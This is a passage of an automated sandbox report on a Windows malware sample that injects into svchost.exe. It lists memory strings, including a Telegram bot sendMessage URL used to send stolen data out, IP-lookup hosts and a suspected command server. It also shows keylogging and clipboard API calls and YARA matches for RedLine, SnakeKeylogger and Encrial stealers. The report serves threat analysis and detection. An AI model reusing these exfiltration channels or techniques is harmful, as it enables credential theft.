                Source: svchost.exe, 00000001.00000002.3766303344.0000000005B51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                Source: svchost.exe, 00000001.00000003.1326512506.000000000346D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.3769445263.0000000007EB0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000001.00000002.3765111392.0000000003574000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                Source: svchost.exe, 00000001.00000002.3766303344.0000000005B51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: svchost.exe, 00000001.00000002.3766303344.0000000005B51000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1326512506.000000000346D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.3769445263.0000000007EB0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000001.00000002.3765111392.0000000003574000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                Source: svchost.exe, 00000001.00000003.1725164095.0000000006CDF000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1725164095.0000000006D19000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.3768126731.0000000006BC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
                Source: svchost.exe, 00000001.00000002.3766303344.0000000005C3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                Source: svchost.exe, 00000001.00000002.3766303344.0000000005C3B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1326512506.000000000346D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.3769445263.0000000007EB0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000001.00000002.3765111392.0000000003574000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                Source: svchost.exe, 00000001.00000002.3766303344.0000000005C3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                Source: svchost.exe, 00000001.00000002.3766303344.0000000005C3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:226546%0D%0ADate%20a
                Source: svchost.exe, 00000001.00000003.1725164095.0000000006CDF000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1725164095.0000000006D19000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.3768126731.0000000006BC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: svchost.exe, 00000001.00000003.1725164095.0000000006D45000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1725164095.0000000006CDF000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1725164095.0000000006D19000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.3768126731.0000000006BC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: svchost.exe, 00000001.00000003.1725164095.0000000006D45000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1725164095.0000000006CDF000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1725164095.0000000006D19000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.3768126731.0000000006BC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: svchost.exe, 00000001.00000002.3766303344.0000000005CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                Source: svchost.exe, 00000001.00000002.3766303344.0000000005CE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                Source: svchost.exe, 00000001.00000003.1725164095.0000000006CDF000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1725164095.0000000006D19000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.3768126731.0000000006BC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: svchost.exe, 00000001.00000003.1725164095.0000000006D45000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1725164095.0000000006CDF000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1725164095.0000000006D19000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.3768126731.0000000006BC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv209h
                Source: svchost.exe, 00000001.00000003.1725164095.0000000006CDF000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1725164095.0000000006D19000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.3768126731.0000000006BC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: svchost.exe, 00000001.00000003.1725164095.0000000006CDF000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1725164095.0000000006D19000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.3768126731.0000000006BC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
                Source: svchost.exe, 00000001.00000002.3766303344.0000000005BA5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.3766303344.0000000005C3B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.3766303344.0000000005C14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                Source: svchost.exe, 00000001.00000002.3766303344.0000000005BA5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1326512506.000000000346D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.3769445263.0000000007EB0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000001.00000002.3765111392.0000000003574000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                Source: svchost.exe, 00000001.00000002.3766303344.0000000005C14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                Source: svchost.exe, 00000001.00000002.3766303344.0000000005C3B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.3766303344.0000000005BCF000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.3766303344.0000000005C14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
                Source: svchost.exe, 00000001.00000003.1725164095.0000000006D45000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1725164095.0000000006CDF000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1725164095.0000000006D19000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.3768126731.0000000006BC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20
                Source: svchost.exe, 00000001.00000003.1725164095.0000000006D45000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1725164095.0000000006CDF000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1725164095.0000000006D19000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.3768126731.0000000006BC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
                Source: svchost.exe, 00000001.00000002.3766303344.0000000005D18000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.3766303344.0000000005D09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                Source: svchost.exe, 00000001.00000002.3766303344.0000000005D13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
                Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
                Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49695 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49695
                Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49694 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49694
                Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49711 version: TLS 1.2
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_0085425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0085425A
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_00854458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00854458
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_0085425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0085425A
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_00840219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00840219
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_0086CDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0086CDAC

                System Summary

                barindex
                Source: 0.2.8JVG9KELay.exe.d70000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                Source: 1.3.svchost.exe.346d000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 1.3.svchost.exe.346d000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 1.3.svchost.exe.346d000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 1.2.svchost.exe.5970000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 1.2.svchost.exe.5970000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 1.2.svchost.exe.5970000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 1.3.svchost.exe.346df20.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 1.3.svchost.exe.346df20.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 1.2.svchost.exe.7eb0000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 1.2.svchost.exe.7eb0000.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 1.2.svchost.exe.7eb0000.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 1.3.svchost.exe.346d000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 1.3.svchost.exe.346d000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 1.3.svchost.exe.346d000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 1.3.svchost.exe.346df20.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 1.2.svchost.exe.3574f2e.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 1.2.svchost.exe.3574f2e.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 1.2.svchost.exe.3574f2e.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                Source: 1.2.svchost.exe.7eb0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 1.2.svchost.exe.7eb0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 1.2.svchost.exe.7eb0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 1.2.svchost.exe.5970f20.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 1.2.svchost.exe.5970f20.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 1.2.svchost.exe.5970f20.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 1.2.svchost.exe.5970f20.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 1.2.svchost.exe.5970f20.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 1.2.svchost.exe.5970f20.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 1.2.svchost.exe.3574f2e.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 1.2.svchost.exe.3574f2e.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 1.2.svchost.exe.3574f2e.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 1.3.svchost.exe.346df20.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 1.3.svchost.exe.346df20.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 1.3.svchost.exe.346df20.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 1.2.svchost.exe.5970000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 1.2.svchost.exe.5970000.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 1.2.svchost.exe.5970000.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 00000000.00000002.1326810338.0000000000D70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                Source: 00000001.00000003.1326512506.000000000346D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000001.00000003.1326512506.000000000346D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 00000001.00000003.1326512506.000000000346D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 00000001.00000002.3766013240.0000000005970000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000001.00000002.3766013240.0000000005970000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 00000001.00000002.3766013240.0000000005970000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 00000001.00000002.3765111392.0000000003574000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000001.00000002.3764565909.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                Source: 00000001.00000002.3769445263.0000000007EB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000001.00000002.3769445263.0000000007EB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 00000001.00000002.3769445263.0000000007EB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: Process Memory Space: svchost.exe PID: 8432, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: This is a third-party compiled AutoIt script.0_2_007E3B4C
                Source: 8JVG9KELay.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: 8JVG9KELay.exe, 00000000.00000002.1326575103.0000000000895000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_7b1a8267-b
                Source: 8JVG9KELay.exe, 00000000.00000002.1326575103.0000000000895000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_1f348bb8-3
                Source: 8JVG9KELay.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_8428c54e-c
                Source: 8JVG9KELay.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_90f734bb-e
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_008440B1: CreateFileW,_memset,DeviceIoControl,CloseHandle,0_2_008440B1
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_00838858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00838858
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_0084545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_0084545F
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_007EE8000_2_007EE800
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_0080DBB50_2_0080DBB5
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_007EFE400_2_007EFE40
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_007EE0600_2_007EE060
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_0086804A0_2_0086804A
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_007F41400_2_007F4140
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_008024050_2_00802405
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_008165220_2_00816522
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_008606650_2_00860665
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_0081267E0_2_0081267E
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_007F68430_2_007F6843
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_0080283A0_2_0080283A
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_008189DF0_2_008189DF
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_00816A940_2_00816A94
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_00860AE20_2_00860AE2
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_007F8A0E0_2_007F8A0E
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_0083EB070_2_0083EB07
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_00848B130_2_00848B13
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_0080CD610_2_0080CD61
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_008170060_2_00817006
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_007F710E0_2_007F710E
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_007F31900_2_007F3190
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_007E12870_2_007E1287
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_008033C70_2_008033C7
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_0080F4190_2_0080F419
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_008016C40_2_008016C4
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_007F56800_2_007F5680
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_008078D30_2_008078D3
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_007F58C00_2_007F58C0
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_00801BB80_2_00801BB8
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_00819D050_2_00819D05
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_00801FD00_2_00801FD0
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_0080BFE60_2_0080BFE6
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_007D35E00_2_007D35E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00408C601_2_00408C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040DC111_2_0040DC11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00407C3F1_2_00407C3F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00418CCC1_2_00418CCC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00406CA01_2_00406CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004028B01_2_004028B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041A4BE1_2_0041A4BE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004182441_2_00418244
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004016501_2_00401650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402F201_2_00402F20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004193C41_2_004193C4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004187881_2_00418788
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402F891_2_00402F89
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402B901_2_00402B90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004073A01_2_004073A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_053FD4EA1_2_053FD4EA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_053FD7B81_2_053FD7B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_053F76331_2_053F7633
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_053FC6BB1_2_053FC6BB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_053FD21B1_2_053FD21B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_053FCC6B1_2_053FCC6B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_053FCF301_2_053FCF30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_053F2EF81_2_053F2EF8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_053F6EE81_2_053F6EE8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_053FEEE01_2_053FEEE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_053FC9931_2_053FC993
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_053F586F1_2_053F586F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_053F43111_2_053F4311
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_053F58801_2_053F5880
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_053FFBA81_2_053FFBA8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_087AE8001_2_087AE800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_087A51681_2_087A5168
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_087A9D681_2_087A9D68
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_087ACDF01_2_087ACDF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_087A96981_2_087A9698
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_087A94781_2_087A9478
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_087A18601_2_087A1860
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_087AEC581_2_087AEC58
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_087A18501_2_087A1850
